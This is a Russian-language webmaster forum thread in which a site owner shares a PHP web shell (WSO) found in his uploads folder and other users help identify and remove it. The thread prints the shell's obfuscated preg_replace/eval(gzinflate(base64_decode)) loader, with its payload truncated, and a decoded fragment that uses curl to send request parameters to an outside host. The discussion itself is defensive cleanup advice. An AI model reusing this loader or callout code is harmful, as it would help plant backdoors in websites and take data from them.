Dismiss Notice
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Что за страшный нах?

Discussion in 'Свободное общение' started by yuris, Apr 27, 2016.

27.04.16 в 23:26
28.04.16 в 05:48
19
824
0
  1. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    На одном из своих сайтов нарыл файл, страненький такой, вот его содержание
    <?PHP
    $auth_pass = "тут 20 цифр";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5 -тут дохуя всяких буква, точек, черточек и циферий - P8C'\x29\x29\x29\x3B",".");?>

    По ходу шелл я так понимаю...?
     
  2. MaximuS

    Staff Member VIP Кинотрафик v2

    Joined:
    Nov 30, 2015
    Messages:
    708
    Best Answers:
    0
    Ratings:
    +399 / 0 / -0
    WSO шелл
     
  3. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    и че теперь делать?
     
  4. Fazer

    Fazer Бывалый

    Joined:
    Dec 15, 2015
    Messages:
    889
    Best Answers:
    0
    Ratings:
    +555 / 1 / -0
    Чистить.
     
  5. MaximuS

    Staff Member VIP Кинотрафик v2

    Joined:
    Nov 30, 2015
    Messages:
    708
    Best Answers:
    0
    Ratings:
    +399 / 0 / -0
    Искать дырки, выставлять грамотно права, чистить
     
  6. byroot

    Забанен

    Joined:
    Oct 10, 2015
    Messages:
    12,295
    Best Answers:
    54
    Ratings:
    +5,206 / 74 / -0
  7. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    Залили его в папку уплоадс, и файл .htaccess в этой же папке очистили и выставили права 644. Что сделал, удалил этот файл с шеллом, вернул обратно .htaccess и выставил права 444, что еще надо сделать?
     
  8. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
  9. byroot

    Забанен

    Joined:
    Oct 10, 2015
    Messages:
    12,295
    Best Answers:
    54
    Ratings:
    +5,206 / 74 / -0
    в поле
    Original Code
    защифрованный код в файле. на верху - расшифрованный, но там ещё есть несколько раз base64_decode, несколько помню, чтою его раскодировать надо сделать base64_encode и тогда увидишь куда этот скрипт ломился и что он делал по курлу...
     
  10. byroot

    Забанен

    Joined:
    Oct 10, 2015
    Messages:
    12,295
    Best Answers:
    54
    Ratings:
    +5,206 / 74 / -0
    Code:
    <?php ?><?php
    $hantu = $_GET[ghost];
    $id = $_GET[id];
    if (substr($id, 0, 2) == "62") {
        $nomor2 = $id;
    } else if (substr($id, 0, 1) == "0") {
        $nomor2 = "62" . substr($id, 1);
    }
    $ch = curl_init(http://zosms.net/andy.php);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'to=' . $nomor2 . '&hantu=' . $hantu . '&submit=Submit');
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_exec($ch);
    curl_close($ch);
    ?>
     
  11. byroot

    Забанен

    Joined:
    Oct 10, 2015
    Messages:
    12,295
    Best Answers:
    54
    Ratings:
    +5,206 / 74 / -0
    но у меня zosms.net даже найти не может, видимо очень старый файл у тебя этот )) или сайт вырубили пока
     
  12. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    @byroot, ) я вообще не в зуб ногой о чем ты говоришь... :) я настолько далек от этого, весь писец. Объясни просто, по-человечьи.
     
  13. MaximuS

    Staff Member VIP Кинотрафик v2

    Joined:
    Nov 30, 2015
    Messages:
    708
    Best Answers:
    0
    Ratings:
    +399 / 0 / -0
    @yuris, какая у тебя версия DLE ?
     
  14. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    эта на которой шелл 9.4
     
  15. MaximuS

    Staff Member VIP Кинотрафик v2

    Joined:
    Nov 30, 2015
    Messages:
    708
    Best Answers:
    0
    Ratings:
    +399 / 0 / -0
    @yuris, насколько я знаю версии до 10,2 или 10,4 уязвимы
    Наверное через gif shell залили
     
  16. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    как недавно выяснилось, что такой же шелл был недавно залит на версию 10.6, так что, дело не в версиях. Это DLE всегда был, есть и будет решетом и похуй какие версии, свободная дырка как у вокзальной шлюхи всегда найдется! :D
     
  17. Karabas Barabas

    Staff Member VIP Кинотрафик v2

    Joined:
    Nov 20, 2015
    Messages:
    8,161
    Best Answers:
    1
    Ratings:
    +3,756 / 12 / -0
    Лишь бы не через зад :D
     
  18. TopicStarter Overlay
    yuris

    yuris Местный

    Joined:
    Sep 21, 2015
    Messages:
    1,508
    Best Answers:
    1
    Ratings:
    +620 / 12 / -0
    Дык DLE один большой дырявый зад, как не поверни - везде дыра...:D
     
    • Нравится Нравится x 1
  19. byroot

    Забанен

    Joined:
    Oct 10, 2015
    Messages:
    12,295
    Best Answers:
    54
    Ratings:
    +5,206 / 74 / -0
    до версии 10,0 периодически вылезали патчи безопасности, после версий выше - ещё ни одной дырки не было официально, и заплатки тоже.
    Так же, последняя дырка - это "Потенциальная угроза в модуле Minify", а minify использовали ни одни разработчики DLE!

    В большинстве случаев так же шеллы заливали через шаблоны. Вы уверены что на версии 9х у вас чистый шаб? Вообще вариантов масса как залить шелл, и дырки ДЛЕ тут ни причём!

    Так что зря вы наговариваете на неё... Если опасаитесь - не используйте!
     
  20. Glam

    Staff Member VIP Кинотрафик v2

    Joined:
    Jun 9, 2015
    Messages:
    332
    Best Answers:
    0
    Ratings:
    +197 / 0 / -0
Яндекс.Метрика